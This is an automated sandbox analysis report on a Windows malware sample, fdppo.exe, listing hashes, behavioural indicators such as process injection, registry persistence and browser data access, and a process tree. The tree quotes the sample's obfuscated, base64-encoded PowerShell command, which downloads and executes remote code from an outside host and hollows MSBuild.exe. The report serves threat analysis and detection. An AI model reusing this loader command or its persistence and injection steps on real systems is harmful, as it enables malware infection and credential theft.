Analysis
-
max time kernel
150s -
max time network
143s -
platform
windows7_x64 -
resource
win7 -
submitted
13-07-2020 14:36
Static task
static1
Behavioral task
behavioral1
Sample
fdppo.exe
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
fdppo.exe
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
fdppo.exe
-
Size
101KB
-
MD5
082348ffb2977a0762e3e5d6f4a47ff4
-
SHA1
a63f12bba792fd01307373a7565b96549eb9f3c8
-
SHA256
8f9fcdd00e43b8845139ba38f9d4f164e526736578eab199e7f7af5d8179f01c
-
SHA512
ac00b157a3ae8af9502658c2fa72d80eb871f4ca9ee6b36393c526fbe0d35383855633bc871623c3088f3cdbd75a537b52ef24d8d1995353896637c3a27cf91c
Malware Config
Signatures
-
Processes:
powershell.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
fdppo.exepowershell.exeMSBuild.execolorcpl.exedescription pid process Token: SeDebugPrivilege 1164 fdppo.exe Token: SeDebugPrivilege 1608 powershell.exe Token: SeDebugPrivilege 1084 MSBuild.exe Token: SeDebugPrivilege 1828 colorcpl.exe -
System policy modification 1 TTPs 1 IoCs
Processes:
colorcpl.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer colorcpl.exe -
Suspicious behavior: MapViewOfSection 8 IoCs
Processes:
MSBuild.execolorcpl.exepid process 1084 MSBuild.exe 1084 MSBuild.exe 1084 MSBuild.exe 1084 MSBuild.exe 1828 colorcpl.exe 1828 colorcpl.exe 1828 colorcpl.exe 1828 colorcpl.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
Processes:
Explorer.EXEpid process 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE -
Processes:
colorcpl.exedescription ioc process Key created \Registry\User\S-1-5-21-1131729243-447456001-3632642222-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 colorcpl.exe -
Processes:
Explorer.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Explorer.EXE -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
fdppo.exepowershell.exeExplorer.EXEcolorcpl.exedescription pid process target process PID 1164 wrote to memory of 1608 1164 fdppo.exe powershell.exe PID 1164 wrote to memory of 1608 1164 fdppo.exe powershell.exe PID 1164 wrote to memory of 1608 1164 fdppo.exe powershell.exe PID 1164 wrote to memory of 1608 1164 fdppo.exe powershell.exe PID 1608 wrote to memory of 1084 1608 powershell.exe MSBuild.exe PID 1608 wrote to memory of 1084 1608 powershell.exe MSBuild.exe PID 1608 wrote to memory of 1084 1608 powershell.exe MSBuild.exe PID 1608 wrote to memory of 1084 1608 powershell.exe MSBuild.exe PID 1608 wrote to memory of 1084 1608 powershell.exe MSBuild.exe PID 1608 wrote to memory of 1084 1608 powershell.exe MSBuild.exe PID 1608 wrote to memory of 1084 1608 powershell.exe MSBuild.exe PID 1336 wrote to memory of 1828 1336 Explorer.EXE colorcpl.exe PID 1336 wrote to memory of 1828 1336 Explorer.EXE colorcpl.exe PID 1336 wrote to memory of 1828 1336 Explorer.EXE colorcpl.exe PID 1336 wrote to memory of 1828 1336 Explorer.EXE colorcpl.exe PID 1828 wrote to memory of 1852 1828 colorcpl.exe cmd.exe PID 1828 wrote to memory of 1852 1828 colorcpl.exe cmd.exe PID 1828 wrote to memory of 1852 1828 colorcpl.exe cmd.exe PID 1828 wrote to memory of 1852 1828 colorcpl.exe cmd.exe PID 1828 wrote to memory of 1636 1828 colorcpl.exe Firefox.exe PID 1828 wrote to memory of 1636 1828 colorcpl.exe Firefox.exe PID 1828 wrote to memory of 1636 1828 colorcpl.exe Firefox.exe PID 1828 wrote to memory of 1636 1828 colorcpl.exe Firefox.exe PID 1828 wrote to memory of 1636 1828 colorcpl.exe Firefox.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
Processes:
powershell.exeMSBuild.execolorcpl.exepid process 1608 powershell.exe 1608 powershell.exe 1084 MSBuild.exe 1084 MSBuild.exe 1084 MSBuild.exe 1828 colorcpl.exe 1828 colorcpl.exe 1828 colorcpl.exe 1828 colorcpl.exe 1828 colorcpl.exe 1828 colorcpl.exe 1828 colorcpl.exe 1828 colorcpl.exe 1828 colorcpl.exe 1828 colorcpl.exe 1828 colorcpl.exe 1828 colorcpl.exe 1828 colorcpl.exe 1828 colorcpl.exe 1828 colorcpl.exe 1828 colorcpl.exe 1828 colorcpl.exe 1828 colorcpl.exe 1828 colorcpl.exe 1828 colorcpl.exe 1828 colorcpl.exe 1828 colorcpl.exe 1828 colorcpl.exe 1828 colorcpl.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
powershell.exeMSBuild.execolorcpl.exedescription pid process target process PID 1608 set thread context of 1084 1608 powershell.exe MSBuild.exe PID 1084 set thread context of 1336 1084 MSBuild.exe Explorer.EXE PID 1084 set thread context of 1336 1084 MSBuild.exe Explorer.EXE PID 1828 set thread context of 1336 1828 colorcpl.exe Explorer.EXE -
Adds Run entry to policy start application 2 TTPs 2 IoCs
Processes:
colorcpl.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run colorcpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\8PPXV4W006 = "C:\\Program Files (x86)\\Zadfhaf\\usery4nh.exe" colorcpl.exe -
Drops file in Program Files directory 1 IoCs
Processes:
colorcpl.exedescription ioc process File opened for modification C:\Program Files (x86)\Zadfhaf\usery4nh.exe colorcpl.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 9 1608 powershell.exe -
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
Explorer.EXEpid process 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of FindShellTrayWindow
- Checks whether UAC is enabled
- Suspicious use of WriteProcessMemory
- Suspicious use of SendNotifyMessage
PID:1336 -
C:\Users\Admin\AppData\Local\Temp\fdppo.exe"C:\Users\Admin\AppData\Local\Temp\fdppo.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1164 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -w 1 /e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdADoAOgBUAGwAcwAxADIAOwANAAoAJAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwB6AC4AegB6AC4AaAB0AC8ATgBlADYANABvAC4AdAB4AHQAJwApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIAAiADQANAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAqACIALAAgACIANAA4ACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACMAIgAsACAAIgA3ADgAIgApAHwASQBFAFgAOwBbAEIAeQB0AGUAWwBdAF0AJABmAD0AWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEkAbgB0AGUAcgBhAGMAdABpAG8AbgBdADoAOgBDAGEAbABsAEIAeQBuAGEAbQBlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAHCBgAE4AYABlAGAAVABgAC4AYABXAGAAZQBgAEIAYABDAGAAbABgAGkAYABlAGAATgBgAFQAHSApACwAJAByAGUAZwAsAFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBDAGEAbABsAFQAeQBwAGUAXQA6ADoATQBlAHQAaABvAGQALAAnAGgAdAB0ACcAKwBbAEMAaABhAHIAXQA4ADAAKwAnAHMAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AegAuAHoAegAuAGgAdAAvAFMAeABUAHAASQAuAHQAeAB0ACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACQAJAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAEMALgBNAF0AOgA6AFIAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABmACkA3⤵
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetThreadContext
- Blacklisted process makes network request
PID:1608 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: MapViewOfSection
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetThreadContext
PID:1084 -
C:\Windows\SysWOW64\colorcpl.exe"C:\Windows\SysWOW64\colorcpl.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- System policy modification
- Suspicious behavior: MapViewOfSection
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetThreadContext
- Adds Run entry to policy start application
- Drops file in Program Files directory
PID:1828 -
C:\Windows\SysWOW64\cmd.exe/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:1852
-
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"3⤵PID:1636